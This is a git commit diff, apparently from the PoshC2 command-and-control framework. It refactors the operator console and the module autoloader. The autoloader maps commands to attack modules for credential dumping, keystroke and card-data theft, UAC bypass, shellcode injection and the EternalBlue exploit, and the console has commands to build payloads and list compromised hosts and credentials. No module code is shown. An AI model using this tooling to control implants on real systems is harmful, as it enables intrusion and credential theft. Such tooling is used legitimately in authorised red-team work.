Process the command once not at every check and have autoruns per handler
m0rv4i
parent
c571088e79
commit
4b2ff9156d
115
AutoLoads.py
115
AutoLoads.py
|
|
@ -25,117 +25,4 @@ def check_module_loaded(module_name, randomuri, user, force=False):
|
|||
new_task(("loadmodule %s" % module_name), user, randomuri)
|
||||
update_mods(new_modules_loaded, randomuri)
|
||||
except Exception as e:
|
||||
print ("Error loadmodule: %s" % e)
|
||||
|
||||
def run_autoloads(command, randomuri, user):
|
||||
if command.lower().strip().startswith("invoke-eternalblue"): check_module_loaded("Exploit-EternalBlue.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("invoke-psuacme"): check_module_loaded("Invoke-PsUACme.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("bloodhound"): check_module_loaded("BloodHound.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("brute-ad"): check_module_loaded("Brute-AD.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("brute-locadmin"): check_module_loaded("Brute-LocAdmin.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("bypass-uac"): check_module_loaded("Bypass-UAC.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("cred-popper"): check_module_loaded("Cred-Popper.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("cve-2016-9192"): check_module_loaded("CVE-2016-9192.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("convertto-shellcode"): check_module_loaded("ConvertTo-Shellcode.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("decrypt-rdcman"): check_module_loaded("Decrypt-RDCMan.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("dump-ntds"): check_module_loaded("Dump-NTDS.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("get-computerinfo"): check_module_loaded("Get-ComputerInfo.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("get-creditcarddata"): check_module_loaded("Get-CreditCardData.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("get-gppautologon"): check_module_loaded("Get-GPPAutologon.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("get-gpppassword"): check_module_loaded("Get-GPPPassword.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("get-idletime"): check_module_loaded("Get-IdleTime.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("get-ipconfig"): check_module_loaded("Get-IPConfig.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("get-keystrokes"): check_module_loaded("Get-Keystrokes.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("get-hash"): check_module_loaded("Get-Hash.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("get-locadm"): check_module_loaded("Get-LocAdm.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("get-mshotfixes"): check_module_loaded("Get-MSHotFixes.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("get-netstat"): check_module_loaded("Get-Netstat.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("get-passnotexp"): check_module_loaded("Get-PassNotExp.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("get-passpol"): check_module_loaded("Get-PassPol.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("get-recentfiles"): check_module_loaded("Get-RecentFiles.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("get-serviceperms"): check_module_loaded("Get-ServicePerms.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("get-userinfo"): check_module_loaded("Get-UserInfo.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("get-wlanpass"): check_module_loaded("Get-WLANPass.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("invoke-pbind"): check_module_loaded("Invoke-Pbind.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("get-domaingroupmember"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("invoke-kerberoast"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("resolve-ipaddress"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("invoke-userhunter"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("invoke-daisychain"): check_module_loaded("invoke-daisychain.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("invoke-hostenum"): check_module_loaded("HostEnum.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("inject-shellcode"): check_module_loaded("Inject-Shellcode.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("inveigh-relay"): check_module_loaded("Inveigh-Relay.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("inveigh"): check_module_loaded("Inveigh.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("invoke-arpscan"): check_module_loaded("Invoke-Arpscan.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("arpscan"): check_module_loaded("Invoke-Arpscan.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("invoke-dcsync"): check_module_loaded("Invoke-DCSync.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("invoke-eventvwrbypass"): check_module_loaded("Invoke-EventVwrBypass.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("invoke-hostscan"): check_module_loaded("Invoke-Hostscan.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("invoke-ms16-032-proxy"): check_module_loaded("Invoke-MS16-032-Proxy.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("invoke-ms16-032"): check_module_loaded("Invoke-MS16-032.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("invoke-mimikatz"): check_module_loaded("Invoke-Mimikatz.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("invoke-psinject"): check_module_loaded("Invoke-PSInject.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("invoke-pipekat"): check_module_loaded("Invoke-Pipekat.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("invoke-portscan"): check_module_loaded("Invoke-Portscan.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("invoke-powerdump"): check_module_loaded("Invoke-PowerDump.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("invoke-psexec"): check_module_loaded("Invoke-SMBExec.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("invoke-reflectivepeinjection"): check_module_loaded("Invoke-ReflectivePEInjection.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("invoke-reversednslookup"): check_module_loaded("Invoke-ReverseDnsLookup.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("invoke-runas"): check_module_loaded("Invoke-RunAs.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("invoke-smblogin"): check_module_loaded("Invoke-SMBExec.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("invoke-smbclient"): check_module_loaded("Invoke-SMBClient.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("invoke-smbexec"): check_module_loaded("Invoke-SMBExec.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("invoke-psexec"): check_module_loaded("Invoke-SMBExec.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("invoke-shellcode"): check_module_loaded("Invoke-Shellcode.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("invoke-sniffer"): check_module_loaded("Invoke-Sniffer.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("invoke-sqlquery"): check_module_loaded("Invoke-SqlQuery.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("invoke-tater"): check_module_loaded("Invoke-Tater.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("invoke-thehash"): check_module_loaded("Invoke-TheHash.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("invoke-tokenmanipulation"): check_module_loaded("Invoke-TokenManipulation.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("invoke-wmichecker"): check_module_loaded("Invoke-WMIChecker.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("invoke-wmicommand"): check_module_loaded("Invoke-WMICommand.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("invoke-wscriptbypassuac"): check_module_loaded("Invoke-WScriptBypassUAC.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("invoke-winrmsession"): check_module_loaded("Invoke-WinRMSession.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("out-minidump"): check_module_loaded("Out-Minidump.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("portscan"): check_module_loaded("PortScanner.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("powercat"): check_module_loaded("powercat.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("invoke-allchecks"): check_module_loaded("PowerUp.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("set-lhstokenprivilege"): check_module_loaded("Set-LHSTokenPrivilege.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("sharpsocks"): check_module_loaded("SharpSocks.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("find-allvulns"): check_module_loaded("Sherlock.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("test-adcredential"): check_module_loaded("Test-ADCredential.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("new-zipfile"): check_module_loaded("Zippy.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("get-netuser"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("invoke-aclscanner"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("get-dfsshare"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("get-objectacl"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("add-objectacl"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("get-netuser"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("get-domainuser"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("get-netcomputer"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("get-domaincomputer"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("get-netuser"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("get-netgroup"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("get-netgroupmember"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("get-netshare"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("invoke-sharefinder"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("get-netdomain"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("get-netdomaincontroller"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("get-netforest"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("find-domainshare"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("get-netforestdomain"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("invoke-mapdomaintrust"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("get-wmireglastloggedon"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("get-wmiregcachedrdpconnection"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("get-wmiregmounteddrive"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("invoke-wmievent"): check_module_loaded("Invoke-WMIEvent.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("remove-wmievent"): check_module_loaded("Invoke-WMIEvent.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("invoke-wmi"): check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("get-lapspasswords"): check_module_loaded("Get-LAPSPasswords.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("run-exe seatbelt"): check_module_loaded("Seatbelt.exe", randomuri, user)
|
||||
if command.lower().strip().startswith("run-exe sharpup"): check_module_loaded("SharpUp.exe", randomuri, user)
|
||||
if command.lower().strip().startswith("run-exe safetydump"): check_module_loaded("SafetyDump.exe", randomuri, user)
|
||||
if command.lower().strip().startswith("run-exe rubeus"): check_module_loaded("Rubeus.exe", randomuri, user)
|
||||
if command.lower().strip().startswith("run-exe sharpview"): check_module_loaded("SharpView.exe", randomuri, user)
|
||||
if command.lower().strip().startswith("run-exe watson"): check_module_loaded("Watson.exe", randomuri, user)
|
||||
if command.lower().strip().startswith("run-exe sharphound"): check_module_loaded("SharpHound.exe", randomuri, user)
|
||||
print ("Error loadmodule: %s" % e)
|
||||
|
|
@ -226,24 +226,24 @@ def startup(user, printhelp = ""):
|
|||
except:
|
||||
pass
|
||||
|
||||
implant_id = raw_input("Select ImplantID or ALL or Comma Separated List (Enter to refresh):: ")
|
||||
pre_command = raw_input("Select ImplantID or ALL or Comma Separated List (Enter to refresh):: ")
|
||||
print ("")
|
||||
|
||||
if implant_id:
|
||||
pre_command = pre_command.lower().strip()
|
||||
if pre_command:
|
||||
try:
|
||||
last = get_lastcommand()
|
||||
if last:
|
||||
if last != implant_id:
|
||||
new_commandhistory(implant_id)
|
||||
if last != pre_command:
|
||||
new_commandhistory(pre_command)
|
||||
else:
|
||||
new_commandhistory(implant_id)
|
||||
new_commandhistory(pre_command)
|
||||
except Exception as e:
|
||||
pass
|
||||
|
||||
if (implant_id == "") or (implant_id.lower() == "back") or (implant_id.lower() == "clear"):
|
||||
if (pre_command == "") or (pre_command == "back") or (pre_command == "clear"):
|
||||
startup(user)
|
||||
|
||||
if "output-to-html" in implant_id.lower():
|
||||
if "output-to-html" in pre_command:
|
||||
generate_table("Tasks")
|
||||
generate_table("C2Server")
|
||||
generate_table("Creds")
|
||||
|
|
@ -251,51 +251,51 @@ def startup(user, printhelp = ""):
|
|||
graphviz()
|
||||
time.sleep(1)
|
||||
startup(user)
|
||||
if ("show-urls" in implant_id.lower()) or ("list-urls" in implant_id.lower()):
|
||||
if ("show-urls" in pre_command) or ("list-urls" in pre_command):
|
||||
urls = get_c2urls()
|
||||
urlformatted = "RandomID URL HostHeader ProxyURL ProxyUsername ProxyPassword CredentialExpiry\n"
|
||||
for i in urls:
|
||||
urlformatted += "%s %s %s %s %s %s %s %s \n" % (i[0],i[1],i[2],i[3],i[4],i[5],i[6],i[7])
|
||||
startup(user, urlformatted)
|
||||
if "add-autorun" in implant_id.lower():
|
||||
autorun = (implant_id.lower()).replace("add-autorun ","")
|
||||
if "add-autorun" in pre_command:
|
||||
autorun = (pre_command).replace("add-autorun ","")
|
||||
autorun = autorun.replace("add-autorun","")
|
||||
add_autorun(autorun)
|
||||
startup(user, "add-autorun: %s\r\n" % autorun)
|
||||
if "list-autorun" in implant_id.lower():
|
||||
if "list-autorun" in pre_command:
|
||||
autoruns = get_autorun()
|
||||
startup(user, autoruns)
|
||||
if "del-autorun" in implant_id.lower():
|
||||
autorun = (implant_id.lower()).replace("del-autorun ","")
|
||||
if "del-autorun" in pre_command:
|
||||
autorun = (pre_command).replace("del-autorun ","")
|
||||
del_autorun(autorun)
|
||||
startup(user, "deleted autorun\r\n")
|
||||
if "nuke-autorun" in implant_id.lower():
|
||||
if "nuke-autorun" in pre_command:
|
||||
del_autoruns()
|
||||
startup(user, "nuked autoruns\r\n")
|
||||
if (implant_id.lower() == "automigrate-frompowershell") or (implant_id.lower() == "am"):
|
||||
if (pre_command == "automigrate-frompowershell") or (pre_command == "am"):
|
||||
startup(user, "automigrate not currently implemented for the Python version of PoshC2\r\n")
|
||||
if "show-serverinfo" in implant_id.lower():
|
||||
if "show-serverinfo" in pre_command:
|
||||
i = get_c2server_all()
|
||||
detailsformatted = "\nHostnameIP: %s\nEncKey: %s\nDomainFrontHeader: %s\nDefaultSleep: %s\nKillDate: %s\nHTTPResponse: %s\nFolderPath: %s\nServerPort: %s\nQuickCommand: %s\nDefaultProxyURL: %s\nDefaultProxyUser: %s\nDefaultProxyPass: %s\nEnableSounds: %s\nAPIKEY: %s\nMobileNumber: %s\nURLS: %s\n%sSocksURLS: %s\nInsecure: %s\nUserAgent: %s\nReferer: %s\nAPIToken: %s\nAPIUser: %s\nEnableNotifications: %s" % (i[1],i[2],i[3],i[4],i[5],i[6],i[7],i[8],i[9],i[10],i[11],i[12],i[13],i[14],i[15],i[16],i[17],i[18],i[19],i[20],i[21],i[22],i[23],i[24])
|
||||
startup(user, detailsformatted)
|
||||
if "turnoff-notifications" in implant_id.lower():
|
||||
if "turnoff-notifications" in pre_command:
|
||||
update_item("EnableNotifications", "C2Server", "No")
|
||||
startup(user, "Turned off notifications on new implant")
|
||||
if "turnon-notifications" in implant_id.lower():
|
||||
if "turnon-notifications" in pre_command:
|
||||
update_item("EnableNotifications", "C2Server", "Yes")
|
||||
startup(user, "Turned on notifications on new implant")
|
||||
if "set-clockworksmsapikey" in implant_id.lower():
|
||||
cmd = (implant_id.lower()).replace("set-clockworksmsapikey ","")
|
||||
if "set-clockworksmsapikey" in pre_command:
|
||||
cmd = (pre_command).replace("set-clockworksmsapikey ","")
|
||||
cmd = cmd.replace("set-clockworksmsapikey","")
|
||||
update_item("MobileNumber", "C2Server", cmd)
|
||||
startup(user, "Updated set-clockworksmsapikey: %s\r\n" % cmd)
|
||||
if "set-clockworksmsnumber" in implant_id.lower():
|
||||
cmd = (implant_id.lower()).replace("set-clockworksmsnumber ","")
|
||||
if "set-clockworksmsnumber" in pre_command:
|
||||
cmd = (pre_command).replace("set-clockworksmsnumber ","")
|
||||
cmd = cmd.replace("set-clockworksmsnumber","")
|
||||
update_item("APIKEY", "C2Server", cmd)
|
||||
startup(user, "Updated set-clockworksmsnumber (Restart C2 Server): %s\r\n" % cmd)
|
||||
if "set-defaultbeacon" in implant_id.lower():
|
||||
new_sleep = (implant_id.lower()).replace("set-defaultbeacon ","")
|
||||
if "set-defaultbeacon" in pre_command:
|
||||
new_sleep = (pre_command).replace("set-defaultbeacon ","")
|
||||
new_sleep = new_sleep.replace("set-defaultbeacon","")
|
||||
if not validate_sleep_time(new_sleep):
|
||||
print(Colours.RED)
|
||||
|
|
@ -306,7 +306,7 @@ def startup(user, printhelp = ""):
|
|||
update_item("DefaultSleep", "C2Server", new_sleep)
|
||||
startup(user, "Updated set-defaultbeacon (Restart C2 Server): %s\r\n" % new_sleep)
|
||||
|
||||
if "opsec" in implant_id.lower():
|
||||
if "opsec" in pre_command:
|
||||
implants = get_implants_all()
|
||||
comtasks = get_tasks()
|
||||
hosts = ""
|
||||
|
|
@ -347,19 +347,19 @@ def startup(user, printhelp = ""):
|
|||
filenameuploaded = line.rstrip().split(":",1)[1]
|
||||
uploads += "%s %s \n" % (hostname[3], filenameuploaded)
|
||||
startup(user, "Users Compromised: \n%s\nHosts Compromised: \n%s\nURLs: \n%s\nFiles Uploaded: \n%s\nCredentials Compromised: \n%s\nHashes Compromised: \n%s" % (users, hosts, urls, uploads, creds, hashes))
|
||||
if "listmodules" in implant_id.lower():
|
||||
if "listmodules" in pre_command:
|
||||
mods = ""
|
||||
for modname in os.listdir("%s/Modules/" % POSHDIR):
|
||||
mods += "%s\r\n" % modname
|
||||
startup(user, mods)
|
||||
if "creds" in implant_id.lower():
|
||||
if "creds" in pre_command:
|
||||
startup(user, "creds module not implemented yet")
|
||||
|
||||
if (implant_id.lower() == "pwnself") or (implant_id.lower() == "p"):
|
||||
if (pre_command == "pwnself") or (pre_command == "p"):
|
||||
subprocess.Popen(["python", "%s%s" % (PayloadsDirectory, "py_dropper.py")])
|
||||
startup(user)
|
||||
|
||||
if (implant_id.lower() == "tasks") or (implant_id.lower() == "tasks "):
|
||||
if (pre_command == "tasks") or (pre_command == "tasks "):
|
||||
alltasks = ""
|
||||
tasks = get_newtasks_all()
|
||||
if tasks is None:
|
||||
|
|
@ -370,11 +370,11 @@ def startup(user, printhelp = ""):
|
|||
alltasks += "(%s) %s\r\n" % ("%s\\%s" % (imname[11],imname[2]),task[2])
|
||||
startup(user, "Queued tasks:\r\n\r\n%s" % alltasks)
|
||||
|
||||
if (implant_id.lower() == "cleartasks") or (implant_id.lower() == "cleartasks "):
|
||||
if (pre_command == "cleartasks") or (pre_command == "cleartasks "):
|
||||
drop_newtasks()
|
||||
startup(user, "Empty tasks queue\r\n")
|
||||
|
||||
if "quit" in implant_id.lower():
|
||||
if "quit" in pre_command:
|
||||
ri = raw_input("Are you sure you want to quit? (Y/n) ")
|
||||
if ri.lower() == "n":
|
||||
startup(user)
|
||||
|
|
@ -383,27 +383,27 @@ def startup(user, printhelp = ""):
|
|||
if ri.lower() == "y":
|
||||
sys.exit(0)
|
||||
|
||||
if "createdaisypayload" in implant_id.lower():
|
||||
if "createdaisypayload" in pre_command:
|
||||
createdaisypayload(user, startup)
|
||||
|
||||
if "createproxypayload" in implant_id.lower():
|
||||
if "createproxypayload" in pre_command:
|
||||
createproxypayload(user, startup)
|
||||
|
||||
if "createnewpayload" in implant_id.lower():
|
||||
if "createnewpayload" in pre_command:
|
||||
createnewpayload(user, startup)
|
||||
|
||||
if (implant_id == "?") or (implant_id == "help"):
|
||||
if (pre_command == "?") or (pre_command == "help"):
|
||||
startup(user, pre_help)
|
||||
|
||||
if (implant_id.lower() == "history") or implant_id.lower() == "history ":
|
||||
if (pre_command == "history") or pre_command == "history ":
|
||||
startup(user, get_history())
|
||||
|
||||
if "use " in implant_id.lower():
|
||||
implant_id = implant_id.replace("use ","")
|
||||
if "use " in pre_command:
|
||||
pre_command = pre_command.replace("use ","")
|
||||
params = re.compile("use ", re.IGNORECASE)
|
||||
implant_id = params.sub("", implant_id)
|
||||
pre_command = params.sub("", pre_command)
|
||||
|
||||
commandloop(implant_id, user)
|
||||
commandloop(pre_command, user)
|
||||
except Exception as e:
|
||||
if 'unable to open database file' in e:
|
||||
startup(user)
|
||||
|
|
@ -423,7 +423,7 @@ def runcommand(command, randomuri):
|
|||
new_commandhistory(command)
|
||||
else:
|
||||
new_commandhistory(command)
|
||||
except Exception as e:
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
implant_type = get_implanttype(randomuri)
|
||||
|
|
@ -446,9 +446,10 @@ def commandloop(implant_id, user):
|
|||
readline.set_completer_delims('\t')
|
||||
readline.parse_and_bind("tab: complete")
|
||||
readline.set_completer(t.listCompleter)
|
||||
if ("-" in implant_id.lower()) or ("all" in implant_id.lower()) or ("," in implant_id.lower()):
|
||||
if ("-" in implant_id) or ("all" in implant_id) or ("," in implant_id):
|
||||
print (Colours.GREEN)
|
||||
command = raw_input("%s> " % (implant_id))
|
||||
command = command.lower().strip()
|
||||
else:
|
||||
hostname = get_hostdetails(implant_id)
|
||||
if hostname[15] == 'OSX':
|
||||
|
|
@ -464,9 +465,10 @@ def commandloop(implant_id, user):
|
|||
print (Colours.GREEN)
|
||||
print ("%s\\%s @ %s (PID:%s)" % (hostname[11],hostname[2], hostname[3],hostname[8]))
|
||||
command = raw_input("%s> " % (implant_id))
|
||||
command = command.lower().strip()
|
||||
|
||||
# if "all" run through all implants get_implants()
|
||||
if implant_id.lower() == "all":
|
||||
if implant_id == "all":
|
||||
if command == "back":
|
||||
startup(user)
|
||||
implant_split = get_implants()
|
||||
|
|
@ -486,7 +488,7 @@ def commandloop(implant_id, user):
|
|||
try:
|
||||
implant_id = get_randomuri(implant_id)
|
||||
runcommand(command, implant_id)
|
||||
except Exception as e:
|
||||
except Exception:
|
||||
print ("Unknown ImplantID")
|
||||
# else run against single uri
|
||||
else:
|
||||
|
|
@ -496,7 +498,7 @@ def commandloop(implant_id, user):
|
|||
# then run back around
|
||||
commandloop(implant_id_orig, user) #is this required for a while loop? looks like it would lead to a stackoverflow anyway?
|
||||
|
||||
except Exception as e:
|
||||
except Exception:
|
||||
print (Colours.RED)
|
||||
print ("Error running against the selected implant ID, ensure you have typed the correct information")
|
||||
print (Colours.END)
|
||||
|
|
|
|||
228
PSHandler.py
228
PSHandler.py
|
|
@ -3,7 +3,7 @@ from Alias import ps_alias
|
|||
from Colours import Colours
|
||||
from Utils import randomuri, validate_sleep_time
|
||||
from DB import new_task, update_sleep, get_history, select_item, update_label, unhide_implant, update_item, kill_implant, get_implantbyid, get_implantdetails, get_pid, get_c2server_all, get_newimplanturl, get_allurls, get_sharpurls, new_urldetails
|
||||
from AutoLoads import check_module_loaded, run_autoloads
|
||||
from AutoLoads import check_module_loaded
|
||||
from Help import COMMANDS, posh_help, posh_help1, posh_help2, posh_help3, posh_help4, posh_help5, posh_help6, posh_help7, posh_help8
|
||||
from Config import ModulesDirectory, PayloadsDirectory, POSHDIR, ROOTDIR
|
||||
from Core import readfile_with_completion, filecomplete
|
||||
|
|
@ -15,6 +15,112 @@ from TabComplete import tabCompleter
|
|||
if os.name == 'nt':
|
||||
import pyreadline.rlmain
|
||||
|
||||
def run_autoloads(command, randomuri, user):
|
||||
if command.startswith("invoke-eternalblue"): check_module_loaded("Exploit-EternalBlue.ps1", randomuri, user)
|
||||
elif command.startswith("invoke-psuacme"): check_module_loaded("Invoke-PsUACme.ps1", randomuri, user)
|
||||
elif command.startswith("bloodhound"): check_module_loaded("BloodHound.ps1", randomuri, user)
|
||||
elif command.startswith("brute-ad"): check_module_loaded("Brute-AD.ps1", randomuri, user)
|
||||
elif command.startswith("brute-locadmin"): check_module_loaded("Brute-LocAdmin.ps1", randomuri, user)
|
||||
elif command.startswith("bypass-uac"): check_module_loaded("Bypass-UAC.ps1", randomuri, user)
|
||||
elif command.startswith("cred-popper"): check_module_loaded("Cred-Popper.ps1", randomuri, user)
|
||||
elif command.startswith("cve-2016-9192"): check_module_loaded("CVE-2016-9192.ps1", randomuri, user)
|
||||
elif command.startswith("convertto-shellcode"): check_module_loaded("ConvertTo-Shellcode.ps1", randomuri, user)
|
||||
elif command.startswith("decrypt-rdcman"): check_module_loaded("Decrypt-RDCMan.ps1", randomuri, user)
|
||||
elif command.startswith("dump-ntds"): check_module_loaded("Dump-NTDS.ps1", randomuri, user)
|
||||
elif command.startswith("get-computerinfo"): check_module_loaded("Get-ComputerInfo.ps1", randomuri, user)
|
||||
elif command.startswith("get-creditcarddata"): check_module_loaded("Get-CreditCardData.ps1", randomuri, user)
|
||||
elif command.startswith("get-gppautologon"): check_module_loaded("Get-GPPAutologon.ps1", randomuri, user)
|
||||
elif command.startswith("get-gpppassword"): check_module_loaded("Get-GPPPassword.ps1", randomuri, user)
|
||||
elif command.startswith("get-idletime"): check_module_loaded("Get-IdleTime.ps1", randomuri, user)
|
||||
elif command.startswith("get-ipconfig"): check_module_loaded("Get-IPConfig.ps1", randomuri, user)
|
||||
elif command.startswith("get-keystrokes"): check_module_loaded("Get-Keystrokes.ps1", randomuri, user)
|
||||
elif command.startswith("get-hash"): check_module_loaded("Get-Hash.ps1", randomuri, user)
|
||||
elif command.startswith("get-locadm"): check_module_loaded("Get-LocAdm.ps1", randomuri, user)
|
||||
elif command.startswith("get-mshotfixes"): check_module_loaded("Get-MSHotFixes.ps1", randomuri, user)
|
||||
elif command.startswith("get-netstat"): check_module_loaded("Get-Netstat.ps1", randomuri, user)
|
||||
elif command.startswith("get-passnotexp"): check_module_loaded("Get-PassNotExp.ps1", randomuri, user)
|
||||
elif command.startswith("get-passpol"): check_module_loaded("Get-PassPol.ps1", randomuri, user)
|
||||
elif command.startswith("get-recentfiles"): check_module_loaded("Get-RecentFiles.ps1", randomuri, user)
|
||||
elif command.startswith("get-serviceperms"): check_module_loaded("Get-ServicePerms.ps1", randomuri, user)
|
||||
elif command.startswith("get-userinfo"): check_module_loaded("Get-UserInfo.ps1", randomuri, user)
|
||||
elif command.startswith("get-wlanpass"): check_module_loaded("Get-WLANPass.ps1", randomuri, user)
|
||||
elif command.startswith("invoke-pbind"): check_module_loaded("Invoke-Pbind.ps1", randomuri, user)
|
||||
elif command.startswith("get-domaingroupmember"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
elif command.startswith("invoke-kerberoast"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
elif command.startswith("resolve-ipaddress"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
elif command.startswith("invoke-userhunter"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
elif command.startswith("invoke-daisychain"): check_module_loaded("invoke-daisychain.ps1", randomuri, user)
|
||||
elif command.startswith("invoke-hostenum"): check_module_loaded("HostEnum.ps1", randomuri, user)
|
||||
elif command.startswith("inject-shellcode"): check_module_loaded("Inject-Shellcode.ps1", randomuri, user)
|
||||
elif command.startswith("inveigh-relay"): check_module_loaded("Inveigh-Relay.ps1", randomuri, user)
|
||||
elif command.startswith("inveigh"): check_module_loaded("Inveigh.ps1", randomuri, user)
|
||||
elif command.startswith("invoke-arpscan"): check_module_loaded("Invoke-Arpscan.ps1", randomuri, user)
|
||||
elif command.startswith("arpscan"): check_module_loaded("Invoke-Arpscan.ps1", randomuri, user)
|
||||
elif command.startswith("invoke-dcsync"): check_module_loaded("Invoke-DCSync.ps1", randomuri, user)
|
||||
elif command.startswith("invoke-eventvwrbypass"): check_module_loaded("Invoke-EventVwrBypass.ps1", randomuri, user)
|
||||
elif command.startswith("invoke-hostscan"): check_module_loaded("Invoke-Hostscan.ps1", randomuri, user)
|
||||
elif command.startswith("invoke-ms16-032-proxy"): check_module_loaded("Invoke-MS16-032-Proxy.ps1", randomuri, user)
|
||||
elif command.startswith("invoke-ms16-032"): check_module_loaded("Invoke-MS16-032.ps1", randomuri, user)
|
||||
elif command.startswith("invoke-mimikatz"): check_module_loaded("Invoke-Mimikatz.ps1", randomuri, user)
|
||||
